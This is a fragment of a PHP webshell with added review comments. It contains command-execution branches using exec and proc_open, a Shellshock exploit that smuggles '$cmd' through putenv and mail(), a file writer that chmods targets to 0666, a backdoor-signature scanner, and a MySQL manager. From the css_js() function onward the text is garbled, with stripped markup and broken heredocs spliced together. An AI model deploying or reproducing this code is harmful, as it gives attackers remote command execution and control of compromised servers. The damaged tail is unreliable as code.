exec($cmd);
        $f = $e->StdOut();
        $res = $f->ReadAll();
    }
    // NOTE(review): the head of this function lies before the visible text, so only the
    // branches shown here are annotated. Each visible branch is gated on function_exists(),
    // so a review of disable_functions should cover proc_open and mail as well.
    elseif (function_exists('proc_open')) {
        // strcspn(): length of the leading part of $cmd that contains no space or tab.
        $length = strcspn($cmd, " \t");
        // The first $length bytes of $cmd become $token.
        $token = substr($cmd, 0, $length);
        if (isset($aliases[$token])) {
            $cmd = $aliases[$token] . substr($cmd, $length);
        }
        // $cmd now holds the command line that is actually run.
        // proc_open descriptors: 0 = stdin, 1 = stdout, 2 = stderr.
        // Both 1 and 2 are piped back here, so error output is captured as well.
        $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            // htmlspecialchars(): converts special characters to HTML entities.
            // ENT_COMPAT, the flag actually passed, converts double quotes and leaves single
            // quotes alone (the original comment attributed this behaviour to ENT_QUOTES).
            $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($p);
    }
    // Bash "Shellshock" vulnerability (CVE-2014-6271).
    // Triage note: the branch sets an environment value that starts with "() {" through
    // putenv(), then calls mail() with an extra-parameters argument. Output is redirected to a
    // tempnam() file with the prefix "data" in the current directory and read back from there.
    // A patched bash, or putenv/mail listed in disable_functions, closes this branch.
    elseif (function_exists('mail')) {
        if (strstr(readlink("/bin/sh"), "bash") != false) {
            $tmp = tempnam(".", "data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            mail("a@127.0.0.1", "", "", "", "-bv");
        } else {
            $res = "Not vuln (not bash)";
        }
        // Original author's note: the ordering is wrong here; the read-back below belongs
        // inside the if-branch above. As written, $tmp is not assigned on the else path.
        $output = @implode('', @file($tmp));
        @unlink($tmp);
        if ($output != "") {
            $res = $output;
        } else {
            $res = "No output, or not vuln.";
        }
    }
    return $res;
}

// Base64-encoded GIF icons embedded in the webshell, keyed by a short kind name.
// Sends a "Content-type: image/gif" header, echoes the decoded bytes of $images[$img]
// and terminates the request with die(). $img is used as the array key without an
// existence check.
function css_img($img) {
    $images = array(
        "exe" =>
            "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
            "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
            "xhIAOw==",
        "dir" =>
            "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
            "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
        "txt" =>
            "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
            "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
            "UpPWG3Ig6Hq/XmRjuZwkAAA7",
        "html" =>
            "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
            "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
            "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
            "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
            "ADs=",
        "js" =>
            "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
            "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
            "a00AjYYBbc/o9HjNniUAADs=",
        "xml" =>
            "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
            "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
            "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
            "IQA7",
        "mp3" =>
            "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
            "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
            "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
        "img" =>
            "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
            "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
            "FxEAOw==",
        "title" =>
            "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
            "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
            "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
        "rar" =>
            "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wiFAP0YEEhwoEE/" .
            "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
            "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
            "aNOmRcjVj02tPxPCzfkvIAA7"
    );
    header('Content-type: image/gif');
    echo base64_decode($images[$img]);
    die();
}

// Take the last three characters of a file name and return the icon key for it
// ('img', 'html', 'exe', 'xml', 'js', 'mp3', 'rar', or 'txt' as the default).
// The switch compares the raw substring, so two-character extensions are listed with
// their leading dot (".js", ".rm", ".gz") and "tml" stands for names ending in "html".
function css_showimg($file) {
    $it = substr($file, -3);
    switch ($it) {
        case "jpg":
        case "gif":
        case "bmp":
        case "png":
        case "ico":
            return 'img';
            break;
        case "htm":
        case "tml":
            return 'html';
            break;
        case "exe":
        case "com":
            return 'exe';
            break;
        case "xml":
        case "doc":
            return 'xml';
            break;
        case ".js":
        case "vbs":
            return 'js';
            break;
        case "mp3":
        case "wma":
        case "wav":
        case "swf":
        case ".rm":
        case "avi":
        case "mp4":
        case "mvb":
            return 'mp3';
            break;
        case "rar":
        case "tar":
        case ".gz":
        case "zip":
        case "iso":
            return 'rar';
            break;
        default:
            return 'txt';
            break;
    }
}

// Echo $data followed by a newline.
function html_n($data) {
    echo "$data\n";
}

// Original note: "Trojan? Unknown".
// Returns true when $filecode contains, case-insensitively (stristr), any of the substrings
// listed for $filetype ('php', 'asp', 'aspx' or 'jsp'); otherwise falls off the end and
// returns nothing. $filetype is used as the array key without an existence check.
// NOTE(review): presumably used to flag other script backdoors in scanned files; confirm
// against the callers. It is a plain substring match, not a reliable detector.
function muma($filecode, $filetype) {
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    foreach ($dim[$filetype] as $code) {
        if (stristr($filecode, $code)) {
            return true;
        }
    }
}

// Original note: "check the file suffix".
// Splits $ftype on '|' and returns true when $file contains any of the pieces.
// stristr() matches anywhere in the string, not only at the end, and ignores case.
// Nothing is returned when no piece matches.
function debug($file, $ftype) {
    $type = explode('|', $ftype);
    foreach ($type as $i) {
        if (stristr($file, $i)) {
            return true;
        }
    }
}

// Replace each "//" in a path with "/".
function str_path($path) {
    return str_replace('//', '/', $path);
}

// Original note: "popup".
// NOTE(review): the literal passed to die() is empty as shown and $msg is never used. The
// markup that presumably wrapped $msg appears to have been lost when the page was extracted.
function msg($msg) {
    die("");
}

// Return the directory part of $nowpath with backslashes turned into "/", URL-encoded.
function uppath($nowpath) {
    $nowpath = str_replace('\\', '/', dirname($nowpath));
    return urlencode($nowpath);
}

// NOTE(review): in the html_* helpers below the string literals contain no tags as shown.
// The markup appears to have been stripped in extraction, so several parameters are never
// referenced. The literals are kept exactly as found.

// Original note: "emit an anchor that carries a target attribute".
function html_ta($url, $name) {
    html_n("$name");
}

// Original note: "HTML anchor".
function html_a($url, $name, $where = '') {
    html_n("$name ");
}

// Original note: "show the image at the given URL".
function html_img($url) {
    html_n("");
}

// Original note: "back".
function back() {
    html_n("");
}

// Original note: "HTML radio input". Emits two lines, one per label ($namei, $namet).
function html_radio($namei, $namet, $v1, $v2) {
    html_n('' . $namei);
    html_n('' . $namet . '

');
}

// Original note: "HTML input". $mode selects between the two output variants.
function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false) {
    if ($mode) {
        html_n("$text");
    } else {
        html_n("$text ");
    }
}

// Original note: "HTML textarea".
function html_text($name, $cols, $rows, $value = '') {
    html_n("

");
}

// Original note: "HTML select".
function html_select($array, $mode = '', $change = '', $name = 'class') {
    html_n("");
}

// Original note: "HTML font".
function html_font($color, $size, $name) {
    html_n("$name");
}

// Normalise a path: backslashes become "/", then each "//" becomes "/".
function File_Str($string) {
    return str_replace('//', '/', str_replace('\\', '/', $string));
}

// Write $filecode to $filename, opened with mode $filemode.
// If the first fwrite() is falsy (failure or zero bytes written), the file is chmod'ed to
// 0666 (world-writable) and the write is retried once on the same handle.
// Returns true on success and false when the retry also fails. Every call is silenced
// with @, so no warning is shown when the open or write fails.
function File_Write($filename, $filecode, $filemode) {
    $key = true;
    $handle = @fopen($filename, $filemode);
    if (!@fwrite($handle, $filecode)) {
        @chmod($filename, 0666);
        $key = @fwrite($handle, $filecode) ? true : false;
    }
    @fclose($handle);
    return $key;
}

// Original note: "return the www root directory".
// Takes realpath('./') and cuts from its end as many characters as the directory part of
// $_SERVER['PHP_SELF'] is long, then normalises the result with File_Str().
function File_Mode() {
    $RealPath = realpath('./');
    $SelfPath = $_SERVER['PHP_SELF'];
    $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
    return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

// Owner name of a file. Runs only where PATH_SEPARATOR is ':'; elsewhere nothing is returned.
// NOTE(review): when posix_getpwuid() is unavailable, $File is still the path string at the
// point it is indexed with ['name']; confirm that this is intended.
function GetFileOwner($File) {
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getpwuid')) {
            $File = posix_getpwuid(fileowner($File));
        }
        return $File['name'];
    }
}

// Group name of a file. Same structure as GetFileOwner(), using posix_getgrgid() and
// filegroup(). The same NOTE(review) about indexing the path string applies here.
function GetFileGroup($File) {
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getgrgid')) {
            $File = posix_getgrgid(filegroup($File));
        }
        return $File['name'];
    }
}

// Format a byte count with a unit suffix, stepping by 1024: " B" (unrounded), then
// " K", " M", " G", " T" and finally " ST", each rounded to two decimals.
function File_Size($size) {
    $kb = 1024;
    $mb = 1024 * $kb;
    $gb = 1024 * $mb;
    $tb = 1024 * $gb;
    $db = 1024 * $tb;
    if ($size < $kb) {
        return $size . " B";
    } elseif ($size < $mb) {
        return round($size / $kb, 2) . " K";
    } elseif ($size < $gb) {
        return round($size / $mb, 2) . " M";
    } elseif ($size < $tb) {
        return round($size / $gb, 2) . " G";
    } elseif ($size < $db) {
        return round($size / $tb, 2) . " T";
    } else {
        return round($size / $db, 2) . " ST";
    }
}

// Read a whole file in binary mode and return whatever fread() returned.
// All calls are silenced with @, so a failed open is not reported.
function File_Read($filename) {
    $handle = @fopen($filename, "rb");
    $filecode = @fread($handle, @filesize($filename));
    @fclose($handle);
    return $filecode;
}

// Original note: "convert the encoding of an array".
// A non-array $data is converted to $output from the encoding mb_detect_encoding() picked out
// of $encode_arr. An array is walked recursively, with its keys converted as well.
// NOTE(review): mb_detect_encoding() is called on $data before the is_array() check.
// NOTE(review): the scalar branch of the loop passes $data (the whole array) to
// mb_convert_encoding() rather than $val; this looks unintended, so confirm.
// NOTE(review): converted keys are added to $data, but the original keys are not removed.
function array_iconv($data, $output = 'utf-8') {
    $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
    $encoded = mb_detect_encoding($data, $encode_arr);
    if (!is_array($data)) {
        return mb_convert_encoding($data, $output, $encoded);
    } else {
        foreach ($data as $key => $val) {
            $key = array_iconv($key, $output);
            if (is_array($val)) {
                $data[$key] = array_iconv($val, $output);
            } else {
                $data[$key] = mb_convert_encoding($data, $output, $encoded);
            }
        }
        return $data;
    }
}

// Original note: "Unknown".
// Returns $data unchanged when it is shorter than $len bytes; otherwise everything from
// byte offset $len onward is replaced with '...'.
function Mysql_Len($data, $len) {
    if (strlen($data) < $len) {
        return $data;
    }
    return substr_replace($data, '...', $len);
}

// Original note: "some JavaScript; the PHP at the end is unknown".
// NOTE(review): from css_js() to the end of this span the text is damaged. The markup inside
// the string literals and the heredoc openers are missing, so the remainder is kept exactly
// as found and is not annotated.
function css_js($num, $code = '') { html_n('"); } //左侧CSS function css_left() { $str = << .menu{width:152px;margin-left:auto;margin-right:auto;} .menu dl{margin-top:2px;} .menu dl dt{top left repeat-x;} .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold; text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;} .menu dl dd ul{list-style:none;} .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px; background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF; border-style:solid;border-width:1px;} .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;} end; html_n($str); $str = << function getObject(objectId){ if(document.getElementById && document.getElementById(objectId)) { return document.getElementById(objectId); } else if (document.all && document.all(objectId)) { return document.all(objectId); } else if (document.layers && document.layers[objectId]) { return document.layers[objectId]; } else { 
return false; } } function showHide(objname){ var obj = getObject(objname); if(obj.style.display == "none"){ obj.style.display = "block"; }else{ obj.style.display = "none"; } } "; $result = @mysql_query($query, $conn); $k = 0; while ($table = @mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ""; echo ""; echo '" . "\r\n"; $k++; } echo "
表名 操作 字符集 大小
' . $table[0] . " 删除 ' . $statucoll[$k] . "" . File_Size($statusize[$k]) . "
"; } } } else { $cookietime = time() - 6 * 3600; setcookie($cookie_name_mysql . 'host', "", $cookietime); setcookie($cookie_name_mysql . 'port', "", $cookietime); setcookie($cookie_name_mysql . 'user', "", $cookietime); setcookie($cookie_name_mysql . 'pass', "", $cookietime); die("连接MYSQL失败,请重新登陆."); } break; default: html_main(); break; } css_foot(); ob_end_flush();